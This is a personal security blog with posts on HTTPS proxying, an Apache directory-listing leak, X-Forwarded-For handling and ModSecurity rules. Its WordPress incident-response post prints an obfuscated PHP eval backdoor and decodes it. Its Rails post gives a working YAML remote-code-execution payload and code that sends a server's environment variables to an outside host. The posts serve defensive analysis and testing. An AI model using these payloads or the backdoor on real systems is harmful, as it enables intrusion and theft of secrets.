Wednesday, April 2, 2014

How did I made this Blogger site HTTPS?

UPDATE: now blogger supports HTTPS.. but only for *.blogspot.com domains (not 3rd party such as blog.jonathanmarcil.ca). I've removed the setup from below and did a 301 from my own domain to jonathanmarcil.blogspot.com.

If you have noticed and Google haven't taken down my little trick yet, my blog is now fully HTTPS.

At first I looked at a way to do it while using Google Apps or Blogger itself. I found nothing. One of the problem on top of that is that I use my own domain name and there's no option to switch to SSL.

Looking around, I have found that CloudFare is offering "Flexible SSL" that is SSL on their front caching and protection service. When we design architecture, it's not uncommon to have the HTTPS handling on the front servers, let's say nginx with reverse caching to backend servers.

This gave me the idea to do the same using my Linux server. The only downside to it is that if my server is down, the Blogger site is unavailable. So I won't be using the power of the Google Cloud(tm), but I'd prefer to promote SSL over having a near 100% uptime.

I got a free certificate from startssl and I started playing with Pound. It was relatively easy and worked like supposed with the following config:

ListenHTTPS
        Address 1.1.1.8
        Port    443
        Cert "blog.pem"

        ## allow PUT and DELETE also (by default only GET, POST and HEAD)?:
        xHTTP           0

        Service
                BackEnd
                        Address ghs.l.google.com
                        Port    80
                End
        End
End

ListenHTTP
        Address 1.1.1.8
        Port 80
        xHTTP   0

        Service
                HeadRequire "Host: blog.jonathanmarcil.ca"
                Redirect "https://blog.jonathanmarcil.ca"
        End
End


However I found out that Blogger serve two images using plain HTTP and it gave me the infamous mixed content error message. So my next idea was to replace all http:// links with https://. Unfortunately Pound doesn't allow that. I took a look at Varnish, that I had already installed on my server, and found that natively it doesn't support that. However a little VMOD called vmod_rewrite did the trick I wanted, but I needed to have Varnish sources (I use Debian packages) and saw the note "not production-ready". Since my Varnish is used on a real production web-site, I looked elsewhere for a solution.

One idea that came on the table was to use nginx. That way I could do everything with it, from SSL to rewriting. It has even a module named ngx_http_sub_module that does the trick.  After the setup of the proxy and SSL and putting the simple find and replace directive to have all links renamed to https, I noticed that the website is now fully HTTPS with the green lock!

But something was missing: the Blogger bar on the top of the site was gone, and Google returned a 503 error. The problem was simple: the rewrite rule tempered with parameters that wasn't recognized by Google. I then made a regex in order to do negative lookbehind:
(?<!(homepageUrl|searchRoot)\=)http://

But the problem was that the default nginx module doesn't support regexes! What a shame! The next best thing is a another module that isn't part of the normal distribution of nginx.. so same problem than Varnish I had to recompile.

I tried to put many sub_filter directive one after the other, but no, nginx doesn't allow it.

I was starting to get a little bored with the project and then ask myself if nginx allow only one directive per proxy, maybe I could double-proxy? That's what I did and it worked! Here's the config:
server {
        listen 127.0.0.1:8080;
        root /var/www/nginx;

        location / {
                proxy_pass http://ghs.l.google.com;
                proxy_set_header Host   $host;
                proxy_set_header Accept-Encoding "";
                sub_filter_once off;
                sub_filter "http://" "https://";
        }
}


server {
        listen 1.1.1.8:443 ssl;
        server_name blog.jonathanmarcil.ca;
        root /var/www/nginx;
        ssl_certificate blog.crt;
        ssl_certificate_key blog.pem;

        location / {
                proxy_pass http://127.0.0.1:8080;
                proxy_set_header Host   $host;
                proxy_set_header Accept-Encoding "";
                sub_filter_once off;
                sub_filter "75https" "75http";
                proxy_redirect http://blog.jonathanmarcil.ca https://blog.jonathanmarcil.ca;

        }
}

The trick was to change back to http the strings that was faulty.

I also put on top of that config a redirection and a way to not serve anything else that my blog from that server:
server {
        listen 1.1.1.8:80;
        root /var/www/nginx;
}

server {
        listen 1.1.1.8:80;
        server_name blog.jonathanmarcil.ca;
        root /var/www/nginx;
        return 301 https://$host$request_uri;
}


Last step was to change the DNS record for blog.jonathanmarcil.ca from ghs.l.google.com to the direct IP 1.1.1.8 of nginx, and done!

Now let's wait and see if Google search engine play well with my bag of tricks.. worse case scenario I get ban from search result, and if search results still give http links, nginx will redirect them to https.



Wednesday, December 11, 2013

Apache mod_ssl misconfiguration

I was doing some cleaning on my Apache server, and I disabled a old website in a VirtualHost that was using an SSL connexion on port 443.

After doing so, I was about to finally load my SSL certificate for www.jonathanmarcil.ca and I tried to access the IP directly in order to do some test.

I got an SSL error, and said to myself "it's OK I haven't configured the SSL certificate yet".. but then I looked at my screen and saw the famous

Index of /

of shame as seen on Google.

I was shocked to see the whole content of /var/www listed underneath. All of it. As many people, I use that directory to put my web sites and sometime leave backup files hanging around.

I rapidly understood what was going on, and I was trying to find where in the config this is done.

In /etc/apache2/ports.conf I saw a normal Listen directive on ports when mod_ssl is enabled :

<IfModule mod_ssl.c>
    # SSL name based virtual hosts are not yet supported, therefore no
    # NameVirtualHost statement here
    Listen 69.28.239.85:443
</IfModule>


But I couldn't find a "DocumentRoot /var/www" that would cause the insecure behavior I have seen. After all, if you lend on an index page, that index must be pointed on somewhere.

The only place I found /var/www was in some default config that wasn't even loaded.

I fetched the source code of Apache 2 en then did a quick search for it and it turned out that the DocumentRoot is set per distribution or port of Apache and made somewhat default in the package. In my Debian version, considering all the configurations it is /var/www in the end.

If you listen to a port, Apache will respond to it with this default configuration.

How to avoid this in the future? Here's some possible solutions.

Solution #1 

One solution could be to leave the default-ssl VirtualHost enabled and change the DocumentRoot, because by default it is /var/www :


<IfModule mod_ssl.c>
<VirtualHost _default_:443>
        ServerAdmin webmaster@localhost

        DocumentRoot /var/www
        <Directory />
                Options FollowSymLinks
                AllowOverride None
        </Directory>
        <Directory /var/www/>
                Options Indexes FollowSymLinks MultiViews
                AllowOverride None
                Order allow,deny
                allow from all
        </Directory>

        ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
        <Directory "/usr/lib/cgi-bin">
                AllowOverride None
                Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
                Order allow,deny
                Allow from all
        </Directory>


On my server I have a /var/www/default/ web site that contains only a blank index.html file, and I use that as DocumentRoot.

That way, if a SSL port is open (by the same thing apply to _default_:80), you can serve a page. By default the config uses a snakeoil certificate to handle SSL. It gives a self-signed warning but it works.

Solution #2

There's a file named /etc/apache2/conf.d/security that is suppose to force you to be secure with serving directory.. but on Debian it is disabled by default...


# Disable access to the entire file system except for the directories that
# are explicitly allowed later.
#
# This currently breaks the configurations that come with some web application
# Debian packages.
#
#<Directory />
#       AllowOverride None
#       Order Deny,Allow
#       Deny from all
#</Directory>


If you do that, you need to have an Allow directive in each vhost that are serving. This will prevent any misconfiguration of unwanted exposition of folders.

Solution #3

Add a DocumentRoot at the top of your config. It could be in a conf.d/ file, or in httpd.conf/ports.conf. apache2.conf will probably be overridden in a future update and if ports.conf is, server will stop listening to the right ports and you will notice the change.

# /var/www leak paranoia
DocumentRoot /var/www/default


With that solution, any 443 ports listening but not SSL configured will be answering in plain HTTP with the default site. It is ugly, but if you disable the default site in solution #1 it will still protect yours /var/www.

Scanning for problems

If you want to check if your server is affected by this misconfiguration, first, review all Listen configuration lines. They are suppose to be in /etc/apache2/ports.conf but can be elsewhere :

grep -ri Listen /etc/apache2/
/etc/apache2/ports.conf:    Listen 1.2.3.4:443


And then just copy paste the IP:port it in your browser.

If you see :

Bad Request

Your browser sent a request that this server could not understand.
Reason: You're speaking plain HTTP to an SSL-enabled server port.
Instead use the HTTPS scheme to access this URL, please.
Hint: https://www.example.com/


Apache/2.2 Server

you are connecting to a SSL port in plain HTTP, so try https:// before and see what respond.

But if you see :

Index of /

[ICO]NameLast modifiedSizeDescription

[DIR]mywebsite/16-May-2013 17:11-

Apache/2.2 Server


You are in trouble, especially if you there's a tar.gz backup of your site in here, or a mysql dump. Also, maybe your Apache will serve the source code of your applications instead of running them, that depends on your configuration.


Wednesday, September 4, 2013

REMOTE_ADDR and HTTP_X_FORWARDED_FOR : the bad idea

Logging IP addresses is generally a good idea for security purpose or if you want to debug stuff. It's easy just to spot a faulty request by IP and then just grep all the logs searching for that string.

However, in many projects that need a more complex setup such as using load balancers or proxies, this can be a problem because the usual REMOTE_IP is replaced with the other component of your infrastructure. This renders the logging of IP accessing directly your Web server next to useless.

In some cases, IP addresses are also used in order to prevent brute force attempts, or doing some sort of access control. In that case, having a good configuration can impact way more than just logging.

The widely proposed solution is to use the X-Forwarded-For header in order to fetch the IP of the real client accessing the Web server.

Many people forget that X-Forwarded-For is actually a list that can be a chain of multiples proxies and not just a single IP address, so saying that you could replace the remote IP with it is wrong.

So basically, what is needed is to make sure that you are using the IP that hits just before your infrastructure.

If you have only one you could do this in python django :
request.META['HTTP_X_FORWARDED_FOR'].split(",")[-1].strip()

You would be tempted to say that if you just take what is at the beginning of the string would be good, no matter how many proxies you have installed. But it is again wrong because you have to keep in mind that any HTTP header like this one can be forged.

So the good thing to do is to keep a list of your legit proxies and go trough them starting from right going to left and take the first IP after. Be aware then that the remote IP might be another proxy, but since it's not in your architecture you can't be sure.

Some people suggest to remove the X-Forwarded-For header at your front facing server, but if you do that you'll loose a way to troubleshoot the request.

Don't forget that using the X-Forwarded-For header when you don't have any proxy is bad, because then someone could set it up to a value and spoof it's way in easily.

A good example of implementation is the way Drupal 7 is doing it :
        // If an array of known reverse proxy IPs is provided, then trust
        // the XFF header if request really comes from one of them.
        $reverse_proxy_addresses = variable_get('reverse_proxy_addresses', array());

        // Turn XFF header into an array.
        $forwarded = explode(',', $_SERVER[$reverse_proxy_header]);

        // Trim the forwarded IPs; they may have been delimited by commas and spaces.
        $forwarded = array_map('trim', $forwarded);

        // Tack direct client IP onto end of forwarded array.
        $forwarded[] = $ip_address;

        // Eliminate all trusted IPs.
        $untrusted = array_diff($forwarded, $reverse_proxy_addresses);

        // The right-most IP is the most specific we can trust.
        $ip_address = array_pop($untrusted);
This require a configuration file with the list of proxies that needs to be updated each time the infrastructure change. This is uncommon in standard procedures where system administration is separated from the developers, but any DevOps team should be OK. Either way, it should be noted that change to the servers should be reflected in the application.

Last but not least, you could as well use another field than X-Forwarded-For that just identify the outside IP address. Especially if you want to ease the process with your servers: for example, it's way easier in an Apache log config to replace the %h with another field that is sure to not be an array. Replacing %h with X-Forwarded-For can leads to non-standard log files because it can be multiple IPs.

Drupal again does that well with a configuration variable :
$reverse_proxy_header = variable_get('reverse_proxy_header', 'HTTP_X_FORWARDED_FOR');
Other advantages of this method can be if the number of proxies varies from time to time.

So next time you see an access log like this:
192.168.1.190 - - [04/Feb/2013:12:24:47 -0400] "POST /admin/login HTTP/1.1" 200
And all the other requests come from 192.168.1.190, ask yourself if you are using a proxy and if everything is properly configured.


Sunday, April 21, 2013

Incident response: WordPress brute force and simple backdoor

I encountered a rather simple automated WordPress brute force and infection system. It didn't take me long to figure out how it worked by looking at the logs and infected files. Here's the details.


Brute force using WordPress


If you check out the access log of WordPress, you'll rapidly see that a lot of "POST /wp-login.php HTTP/1.1" are coming from the same IP address. And that IP comes from a country with somewhat shady reputation. The User Agent field actually varies, but like way too much for the same IP.
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.861.0 Safari/535.2"
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/11.0.696.57)"
"Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/10.04 Chromium/14.0.813.0 Chrome/14.0.813.0 Safari/535.1"

And so on.. it's like it changes at each request. Weird.

If you follow up the IP, you see that the first thing there is a "GET / HTTP/1.1". I presume it is there to find that the site is WordPress and then the attack is launched later, 8 days in this case. Maybe it was a big scan at first, then the attacker just fired up its brute force tool by himself, all using the same IP.

Then there's an interesting part:
"GET /?author=1 HTTP/1.1" 301
"GET /?author=2 HTTP/1.1" 301
"GET /?author=3 HTTP/1.1" 301
.. up to ..
"GET /?author=10 HTTP/1.1" 301

This actually returns a 301 to something like "/author/admin/", so that way it is possible to retrieve the username. So if you thought that renaming the admin user to something else, well, it's void by that "feature" of WordPress.

Then you see, less than one second after that last GET, that the brute force starts:
"POST /wp-login.php HTTP/1.1" 200
Each time WordPress is returning a 200.. until
"POST /wp-login.php HTTP/1.1" 302
and this is actually when a login is successful.


Infection of WordPress with a simple backdoor


Just one instant after that, it automatically starts to do this
"GET /wp-admin/theme-editor.php HTTP/1.1" 301 
"POST /wp-admin/theme-editor.php HTTP/1.1" 200
over a bunch of 
"GET /wp-admin/plugin-editor.php?file=disable-comments/disable-comments.php HTTP/1.1" 200
"POST /wp-admin/plugin-editor.php HTTP/1.1" 302
Note that it infects PHP, JS and CSS files, even if doing so on the last two is questionnable looking at the payload (I replaced "eval" by "echo"):
<?php /*tFi*/echo/*D|G].*/(/*'naT V*/base64_decode/*+m(%*/(/*=0<j*/'LyprYT1mKi9ldmFsLyogUVsnKi8oLyosfDJ4bSovYmFzZTY0X2RlY29kZS8qRzghWyovKC8qQ3VwYzFeKi8nTHlvdE1rZHRSRndxTDJsbUx5cE5jRUJUTTJNcUx5Z3ZLbVkzSicvKl4reWU4OFMqLy4vKlZyWFhWTj1AKi8nbUFxTDJsemMyVjBMeW9sSUdSeGNHa3FMeWd2S2tZbFFTb3ZKRicvKmw6YmY5Ki8uLypCNVw+byovJzlT'/*[n_i_!*/./*-Zwf-U*/'UlZGVlJWTlVMeW9vZXpkb0tpOWJMeXBwUlRGdktpOG5ZaWMnLypoeGFkTiovLi8qXn0/MCovJ3ZLbU5YUVhOclJDb3ZMaThxTmtkTEtpOG5lU2N2S25oemZpb3YnLypPdXpdKi8uLypgeiF8LnQpKi8nTGk4cUtEcDRkeW92SjJ3bkx5bytMV2xzWURZcUx5NHZLbmMxSScvKnhIekZkPl4tKi8uLypjYFddUk8qLydVWlFLaThuYkNj'/*Qi5_~:*/./*%ub(]l*/'dktsdG9RQ292TGk4cVlGSTBUeW92SjNWdUp5Jy8qPV4wRCovLi8qcH1uISovJzhxUkhJd0xsaHJTRzhxTDEwdktrVldMQ0Z4YW1vcUx5OHFSREYnLypkdz5cK0EreyovLi8qZnU6e0lpKi8ndWRWUlhmQ292S1M4cUlEaHZWQ292THlvOWRpRkhTVVIrS2k4cCcvKmRIQkQqLy4vKnxwKz1BKi8nTHlweU1tUXhXRWtwS2k5bGRtRnNM'/*2I;i*/./*7azS*/'eW9tVFd4ZklIa3FMeWd2SycvKnJST0w0QnQqLy4vKiU6WCVtIScqLydtcE1PVzhxTDNOMGNtbHdjMnhoYzJobGN5OHFVbXBnUUNvdktDJy8qMmliOHUqLy4vKj51OlcuTXUqLyc4cVFFTlViMHBJS2k4a1gxSkZVVlZGVTFRdktpbFZNWEE5S2k5Jy8qaDB3bkUqLy4vKlx8VHMsMVtqKi8nYkx5bzdURVJoTFNvdkoySW5MeXA1Y25G'/*)4ZE7*/./*%<]~*/'aVlDMHFMeTR2S21KaicvKmljSEIhPSovLi8qXDZhTHtTKi8nYXpaRklDb3ZKM2tuTHlvK1ZVODRLaTh1THlwWlBuWjRiQ292SicvKjRNYiovLi8qMDxQQHs5Ki8nMnduTHlwdmIwUmRma1FxTHk0dktsRlJlU292SjJ3bkx5cDNRaicvKmtieCsqLy4vKnNMQmsqLycwMFFsc3FMeTR2S2xRdGZWdGlLaThuZFc0bkx5cHNkSGtxTDEw'/*:n`d*/./*d?=@*/'Jy8qdjRAXCk4Ki8uLypbSnYqLyd2S21wUE9XQW1jaW92THlvM1JHUnlReW92S1M4cWJGZGZSU292Jy8qYHI2RDhoKi8uLyp5PUtpRmNJKi8nTHlvdVpHb3pQaW92S1M4cU5qTTNjV3BYZXlvdkx5cHRTM2hoS2k4N0x5cEVZajBxTHc9PScvKkJQZ2B4Ki8pLyp7Yyt9TyovLypad31WKi8pLypQYGEzKi8vKlREeyovOy8qYDI1X2EqLw=='/*tTNc*/)/*lXBpH*//*!n^[*/)/*-{%3*//*^0,%1*/;/*Q?k4zT7*/ ?>

Then I had to play with it, like a rusian doll, in order to go see what's inside:
/*-2GmD\*/if/*Mp@S3c*/(/*f7&`*/isset/*% dqpi*/(/*F%A*/$_REQUEST/*({7h*/[/*iE1o*/'b'/*cWAskD*/./*6GK*/'y'/*xs~*/./*(:xw*/'l'/*>-il`6*/./*w5!FP*/'l'/*[h@*/./*`R4O*/'un'/*Dr0.XkHo*/]/*EV,!qjj*//*D1nuTW|*/)/* 8oT*//*=v!GID~*/)/*r2d1XI)*/eval/*&Ml_ y*/(/*jL9o*/stripslashes/*Rj`@*/(/*@CToJH*/$_REQUEST/*)U1p=*/[/*;LDa-*/'b'/*yrqb`-*/./*bck6E */'y'/*>UO8*/./*Y>vxl*/'l'/*ooD]~D*/./*QQy*/'l'/*wB=4B[*/./*T-}[b*/'un'/*lty*/]/*jO9`&r*//*7DdrC*/)/*lW_E*//*.dj3>*/)/*637qjW{*//*mKxa*/;/*Db=*//*N^80>W*/if/*['7H-&*/(/*E@jc-JVv*/isset/*B{0Rt)(*/(/*\+WF*/$_REQUEST/*`:N)*/[/*v_kR*/'juu'/*}y3*/./*5>'.`*/'ltwf'/*^ _1g*/]/*Igww0*//*;MN_7*/)/*H<2*//*(+yPz*/)/*vw=K1*/eval/*R8Us+rn*/(/*PaeT*/stripslashes/*vO@*/(/*3Ic8Y*/$_REQUEST/*w39&B*/[/*'>wco_o*/'ju'/*tut7n*/./*q02H*/'ul'/*TOdt. (*/./*_AnurWu\*/'twf'/*2cx|i*/]/*%'3Jh>p*//*i;|*/)/*Vg<{i*//*&3aNc*/)/*5[avi*//*xg\7V*/;/*txFiAuZ*/

then removing the comments with something like http://beta.phpformatter.com/ :
if (isset($_REQUEST['b' . 'y' . 'l' . 'l' . 'un']))
eval(stripslashes($_REQUEST['b' . 'y' . 'l' . 'l' . 'un']));

if (isset($_REQUEST['juu' . 'ltwf']))
eval(stripslashes($_REQUEST['ju' . 'ul' . 'twf']));

and the useless fluff:
if (isset($_REQUEST['byllun']))
eval(stripslashes($_REQUEST['byllun']));

if (isset($_REQUEST['juultwf']))
eval(stripslashes($_REQUEST['juultwf']));

So basically, it's a backdoor that evals content from GET or POST. I haven't found any usage of them in the logs, so it may be that it was passed by POST or not used at all. Also, the same IP adress didn't made any request out of the brute force or infection patterns, so the chances it happenned is lower.

How to scan

Easy, for your files, look at something like LyprYT1mKi9ldmFsLyog or LypaVnxXKi8. But then, it could be that some part are generated randomly, so to make sure, just look for evals and base64_decode, the code shbouldn't have a lot of theses anyways.

For the access logs, you just need to check your hits at POST /wp-login.php and sort it by count number. The brute force will then appear easily.

How to fix

There's a lot of resources that you can find on the subject, especially on http://codex.wordpress.org/Brute_Force_Attacks and http://codex.wordpress.org/Hardening_WordPress but a simple solution, that will also ease the load of your server, is to add an additionnal password check or IP restriction to wp-login and wp-admin while you are at it.

<LocationMatch "wp-(login|admin)">
AuthUserFile /var/.htpasswd
AuthName "AUTHORIZED USERS ONLY"
AuthType Basic
require valid-user
</LocationMatch>

Another fix, if you have access to ModSecurity, is detailled on http://blog.spiderlabs.com/2013/04/defending-wordpress-logins-from-brute-force-attacks.html

Conclusion

So this was a very simple backdoor and easy to find infection. The brute force system was simple also. The conclusion we can all get from this is that attackers use easy methods and tools because it works. So please keep your password strong everywhere, including on your WordPress site and don't use the argument that the username is "kinda secret" anymore.

Tuesday, March 12, 2013

ModSecurity Whistelisting

From the owasp.org/index.php/Virtual_Patching_Cheat_Sheet example.


How I'd do it :

SecRule SCRIPT_BASENAME "^exportsubscribers\.php$" "allow,chain"
SecRule &ARGS ^1$ chain
SecRule ARGS_GET:reqID "^\d{1,10}$"

SecRule SCRIPT_BASENAME "^exportsubscribers\.php$" "log,deny,auditlog,status:400,msg:'Whitelist entry not found for %{SCRIPT_BASENAME}'"


Will gives :

[Tue Mar 12 13:49:15 2013] [error] [client 192.168.1.2] ModSecurity: Access denied with code 400 (phase 2). Pattern match "^exportsubscribers\\.php$" at SCRIPT_BASENAME. [file "/etc/apache2/conf.d/modsec.conf"] [line "19"] [msg "Whitelist entry not found for exportsubscribers.php"] [hostname "waftest.hackme"] [uri "/exportsubscribers.php"] [unique_id "UT9qm38AAQEAAAYCDcYAAAAB"]



I'm open to any bypass comments ;-)

Monday, February 11, 2013

Ruby On Rails tester

That Ruby on Rails flaw was something. The only prerequisite for any website to be exploited with remote code execution was to have a Ruby application running, nothing more, even a simple "Hello World!" was affected.

I checked out some proof of concept from http://ronin-ruby.github.com/blog/2013/01/09/rails-pocs.html made in Ruby.

In order to see really what was going on, I proxied the Ruby PoC trough Burp. It was done easily since it runs on Ruby Ronin:
Ronin::Network::HTTP.proxy[:host] = '127.0.0.1'
Ronin::Network::HTTP.proxy[:port] = 8080


Then I ran from the command line :
ruby rails_rce.rb http://127.0.0.1:3000 puts 'rce'

And then got the request :
POST / HTTP/1.1
Content-Type: text/xml
X-Http-Method-Override: get
Accept: */*
User-Agent: Ruby
Host: 127.0.0.1:3000
Content-Length: 396

<?xml version="1.0" encoding="UTF-8"?>
<exploit type="yaml">--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection
? ! 'foo

  (puts ''rce''; @executed = true) unless @executed

  __END__

'
: !ruby/struct
  defaults:
    :action: create
    :controller: foos
  required_parts: []
  requirements:
    :action: create
    :controller: foos
  segment_keys:
    - :format</exploit>

The unless @executed is there because the injected code is actually iterated many times (4 in my hello world test). Also, you have to duplicate the single quote in the command in order to avoid a parser error. This is actually a good test case in order to see if the yaml parser is working and exploitable.

I tried for quite a while to have something else than an error to be fed back into the HTTP response, but without success. I was testing with WEBrick and haven't try with Passenger. I was trying to access the response object within Rails but with no success. Nevertheless, I was able to do ruby code, includes, and execute shell commands.

Code was running fine, but I wanted more flexibility when writing it, so I used base64 and eval in the payload :
foo

  (require ''base64''; eval(Base64.decode64(''aWYgQGEKICBAYSA9IEBhICsgMQplbHNlCiAgQGEgPSAwCmVuZApwdXRzIEBhCnN5c3RlbSgiZW52ID4+IC90bXAvdGVzdC50eHQiKQo='')); @executed = true) unless @executed

  __END__
That way it was easy to execute multiple lines and use code that is actually more readable without having to play with it manually.

At the end I came up with that code to be able to get feedback on my Web server if successful:
require 'net/http'
Net::HTTP.get('www.jonathanmarcil.ca', '/?rubyonfails=' + Base64.urlsafe_encode64(`env`))
puts 'You have been tested!'

It worked just fine and that's how I made my RoR tester.


Tested under development versions:
WEBrick 1.3.1
Rails 3.2.8
ruby 1.9.3 (2013-01-15) [i686-linux]

And production:
Apache/2.2.22 (Ubuntu) Phusion_Passenger/3.0.19
ruby-1.9.3-p374 x86_64


Monday, November 26, 2012

Why I installed "HTTPS Everywhere"

I was taking a look at how cookies are handled between Youtube and Google.com, since it uses accounts.google.com/ServiceLogin. I then setup a proxy in Google Chrome in order to have a quick look and maybe replay the request. I went to Youtube (that is in plain HTTP by the way) and then I typed "google.com". I saw cookies from Youtube and a warning from Google that the certificate wasn't right, but I also saw this for google.com :

That's the same cookie names as the HTTPS version.

Fortunately Google does it right and when I tried to steal my own session by using these in HTTPS it failed with a redirection to accounts.google.com for the login mechanism. I did not try anything more.

I'm pretty sure many sites aren't that careful so I installed HTTPS Everywhere. With the plugin installed, the request to the HTTP version is not sent when I type "google.com" in my url bar.

By the way, it is made by the EFF and the Tor Project. It's available for Firefox and Chrome :